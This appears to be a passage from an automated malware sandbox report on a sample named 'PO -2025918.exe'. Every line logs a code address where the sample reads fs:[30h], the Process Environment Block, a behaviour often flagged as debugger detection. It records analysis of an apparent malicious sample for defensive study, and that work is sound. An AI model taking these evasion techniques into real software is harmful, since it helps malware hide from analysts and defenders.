                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C107C3 mov eax, dword ptr fs:[00000030h]4_2_01C107C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B907AF mov eax, dword ptr fs:[00000030h]4_2_01B907AF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1E7E1 mov eax, dword ptr fs:[00000030h]4_2_01C1E7E1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B947FB mov eax, dword ptr fs:[00000030h]4_2_01B947FB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B947FB mov eax, dword ptr fs:[00000030h]4_2_01B947FB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3678E mov eax, dword ptr fs:[00000030h]4_2_01C3678E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h]4_2_01BB27ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h]4_2_01BB27ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h]4_2_01BB27ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C447A0 mov eax, dword ptr fs:[00000030h]4_2_01C447A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9C7C0 mov eax, dword ptr fs:[00000030h]4_2_01B9C7C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC273C mov eax, dword ptr fs:[00000030h]4_2_01BC273C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC273C mov ecx, dword ptr fs:[00000030h]4_2_01BC273C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC273C mov eax, dword ptr fs:[00000030h]4_2_01BC273C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C14755 mov eax, dword ptr fs:[00000030h]4_2_01C14755
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC720 mov eax, dword ptr fs:[00000030h]4_2_01BCC720
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC720 mov eax, dword ptr fs:[00000030h]4_2_01BCC720
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1E75D mov eax, dword ptr fs:[00000030h]4_2_01C1E75D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90710 mov eax, dword ptr fs:[00000030h]4_2_01B90710
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC0710 mov eax, dword ptr fs:[00000030h]4_2_01BC0710
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC700 mov eax, dword ptr fs:[00000030h]4_2_01BCC700
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98770 mov eax, dword ptr fs:[00000030h]4_2_01B98770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90750 mov eax, dword ptr fs:[00000030h]4_2_01B90750
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2750 mov eax, dword ptr fs:[00000030h]4_2_01BD2750
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2750 mov eax, dword ptr fs:[00000030h]4_2_01BD2750
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0C730 mov eax, dword ptr fs:[00000030h]4_2_01C0C730
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC674D mov esi, dword ptr fs:[00000030h]4_2_01BC674D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC674D mov eax, dword ptr fs:[00000030h]4_2_01BC674D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC674D mov eax, dword ptr fs:[00000030h]4_2_01BC674D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC66B0 mov eax, dword ptr fs:[00000030h]4_2_01BC66B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC6A6 mov eax, dword ptr fs:[00000030h]4_2_01BCC6A6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94690 mov eax, dword ptr fs:[00000030h]4_2_01B94690
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94690 mov eax, dword ptr fs:[00000030h]4_2_01B94690
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C106F1 mov eax, dword ptr fs:[00000030h]4_2_01C106F1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C106F1 mov eax, dword ptr fs:[00000030h]4_2_01C106F1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA6C7 mov ebx, dword ptr fs:[00000030h]4_2_01BCA6C7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA6C7 mov eax, dword ptr fs:[00000030h]4_2_01BCA6C7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9262C mov eax, dword ptr fs:[00000030h]4_2_01B9262C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC6620 mov eax, dword ptr fs:[00000030h]4_2_01BC6620
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8620 mov eax, dword ptr fs:[00000030h]4_2_01BC8620
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE627 mov eax, dword ptr fs:[00000030h]4_2_01BAE627
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2619 mov eax, dword ptr fs:[00000030h]4_2_01BD2619
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h]4_2_01C5866E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h]4_2_01C5866E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h]4_2_01BA260B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC2674 mov eax, dword ptr fs:[00000030h]4_2_01BC2674
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E609 mov eax, dword ptr fs:[00000030h]4_2_01C0E609
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h]4_2_01BCA660
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h]4_2_01BCA660
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAC640 mov eax, dword ptr fs:[00000030h]4_2_01BAC640
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C269C0 mov eax, dword ptr fs:[00000030h]4_2_01C269C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h]4_2_01B909AD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h]4_2_01B909AD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5A9D3 mov eax, dword ptr fs:[00000030h]4_2_01C5A9D3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h]4_2_01BA29A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1E9E0 mov eax, dword ptr fs:[00000030h]4_2_01C1E9E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC29F9 mov eax, dword ptr fs:[00000030h]4_2_01BC29F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC29F9 mov eax, dword ptr fs:[00000030h]4_2_01BC29F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B9A9D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B9A9D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B9A9D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B9A9D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B9A9D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B9A9D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC49D0 mov eax, dword ptr fs:[00000030h]4_2_01BC49D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C189B3 mov esi, dword ptr fs:[00000030h]4_2_01C189B3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C189B3 mov eax, dword ptr fs:[00000030h]4_2_01C189B3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C189B3 mov eax, dword ptr fs:[00000030h]4_2_01C189B3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64940 mov eax, dword ptr fs:[00000030h]4_2_01C64940
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C10946 mov eax, dword ptr fs:[00000030h]4_2_01C10946
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B88918 mov eax, dword ptr fs:[00000030h]4_2_01B88918
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B88918 mov eax, dword ptr fs:[00000030h]4_2_01B88918
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C34978 mov eax, dword ptr fs:[00000030h]4_2_01C34978
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C34978 mov eax, dword ptr fs:[00000030h]4_2_01C34978
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1C97C mov eax, dword ptr fs:[00000030h]4_2_01C1C97C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E908 mov eax, dword ptr fs:[00000030h]4_2_01C0E908
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E908 mov eax, dword ptr fs:[00000030h]4_2_01C0E908
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD096E mov eax, dword ptr fs:[00000030h]4_2_01BD096E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD096E mov edx, dword ptr fs:[00000030h]4_2_01BD096E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD096E mov eax, dword ptr fs:[00000030h]4_2_01BD096E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1C912 mov eax, dword ptr fs:[00000030h]4_2_01C1C912
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB6962 mov eax, dword ptr fs:[00000030h]4_2_01BB6962
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB6962 mov eax, dword ptr fs:[00000030h]4_2_01BB6962
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB6962 mov eax, dword ptr fs:[00000030h]4_2_01BB6962
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C2892B mov eax, dword ptr fs:[00000030h]4_2_01C2892B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1892A mov eax, dword ptr fs:[00000030h]4_2_01C1892A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C608C0 mov eax, dword ptr fs:[00000030h]4_2_01C608C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5A8E4 mov eax, dword ptr fs:[00000030h]4_2_01C5A8E4
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90887 mov eax, dword ptr fs:[00000030h]4_2_01B90887
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC8F9 mov eax, dword ptr fs:[00000030h]4_2_01BCC8F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC8F9 mov eax, dword ptr fs:[00000030h]4_2_01BCC8F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1C89D mov eax, dword ptr fs:[00000030h]4_2_01C1C89D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE8C0 mov eax, dword ptr fs:[00000030h]4_2_01BBE8C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA830 mov eax, dword ptr fs:[00000030h]4_2_01BCA830
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h]4_2_01BB2835
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h]4_2_01BB2835
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h]4_2_01BB2835
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2835 mov ecx, dword ptr fs:[00000030h]4_2_01BB2835
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h]4_2_01BB2835
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h]4_2_01BB2835
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C26870 mov eax, dword ptr fs:[00000030h]4_2_01C26870
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C26870 mov eax, dword ptr fs:[00000030h]4_2_01C26870
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1E872 mov eax, dword ptr fs:[00000030h]4_2_01C1E872
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1E872 mov eax, dword ptr fs:[00000030h]4_2_01C1E872
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1C810 mov eax, dword ptr fs:[00000030h]4_2_01C1C810
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94859 mov eax, dword ptr fs:[00000030h]4_2_01B94859
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94859 mov eax, dword ptr fs:[00000030h]4_2_01B94859
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC0854 mov eax, dword ptr fs:[00000030h]4_2_01BC0854
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3483A mov eax, dword ptr fs:[00000030h]4_2_01C3483A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3483A mov eax, dword ptr fs:[00000030h]4_2_01C3483A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA2840 mov ecx, dword ptr fs:[00000030h]4_2_01BA2840
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0BBE mov eax, dword ptr fs:[00000030h]4_2_01BA0BBE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0BBE mov eax, dword ptr fs:[00000030h]4_2_01BA0BBE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3EBD0 mov eax, dword ptr fs:[00000030h]4_2_01C3EBD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1CBF0 mov eax, dword ptr fs:[00000030h]4_2_01C1CBF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBEBFC mov eax, dword ptr fs:[00000030h]4_2_01BBEBFC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98BF0 mov eax, dword ptr fs:[00000030h]4_2_01B98BF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98BF0 mov eax, dword ptr fs:[00000030h]4_2_01B98BF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98BF0 mov eax, dword ptr fs:[00000030h]4_2_01B98BF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB0BCB mov eax, dword ptr fs:[00000030h]4_2_01BB0BCB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB0BCB mov eax, dword ptr fs:[00000030h]4_2_01BB0BCB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB0BCB mov eax, dword ptr fs:[00000030h]4_2_01BB0BCB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90BCD mov eax, dword ptr fs:[00000030h]4_2_01B90BCD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90BCD mov eax, dword ptr fs:[00000030h]4_2_01B90BCD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90BCD mov eax, dword ptr fs:[00000030h]4_2_01B90BCD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C44BB0 mov eax, dword ptr fs:[00000030h]4_2_01C44BB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C44BB0 mov eax, dword ptr fs:[00000030h]4_2_01C44BB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C38B42 mov eax, dword ptr fs:[00000030h]4_2_01C38B42
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C26B40 mov eax, dword ptr fs:[00000030h]4_2_01C26B40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C26B40 mov eax, dword ptr fs:[00000030h]4_2_01C26B40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5AB40 mov eax, dword ptr fs:[00000030h]4_2_01C5AB40
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C44B4B mov eax, dword ptr fs:[00000030h]4_2_01C44B4B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C44B4B mov eax, dword ptr fs:[00000030h]4_2_01C44B4B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h]4_2_01C62B57
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h]4_2_01C62B57
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h]4_2_01C62B57
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h]4_2_01C62B57
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3EB50 mov eax, dword ptr fs:[00000030h]4_2_01C3EB50
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBEB20 mov eax, dword ptr fs:[00000030h]4_2_01BBEB20
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBEB20 mov eax, dword ptr fs:[00000030h]4_2_01BBEB20
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8CB7E mov eax, dword ptr fs:[00000030h]4_2_01B8CB7E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64B00 mov eax, dword ptr fs:[00000030h]4_2_01C64B00
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h]4_2_01C0EB1D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B88B50 mov eax, dword ptr fs:[00000030h]4_2_01B88B50
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C58B28 mov eax, dword ptr fs:[00000030h]4_2_01C58B28
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C58B28 mov eax, dword ptr fs:[00000030h]4_2_01C58B28
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98AA0 mov eax, dword ptr fs:[00000030h]4_2_01B98AA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98AA0 mov eax, dword ptr fs:[00000030h]4_2_01B98AA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE6AA4 mov eax, dword ptr fs:[00000030h]4_2_01BE6AA4
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8A90 mov edx, dword ptr fs:[00000030h]4_2_01BC8A90
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h]4_2_01B9EA80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64A80 mov eax, dword ptr fs:[00000030h]4_2_01C64A80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCAAEE mov eax, dword ptr fs:[00000030h]4_2_01BCAAEE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCAAEE mov eax, dword ptr fs:[00000030h]4_2_01BCAAEE
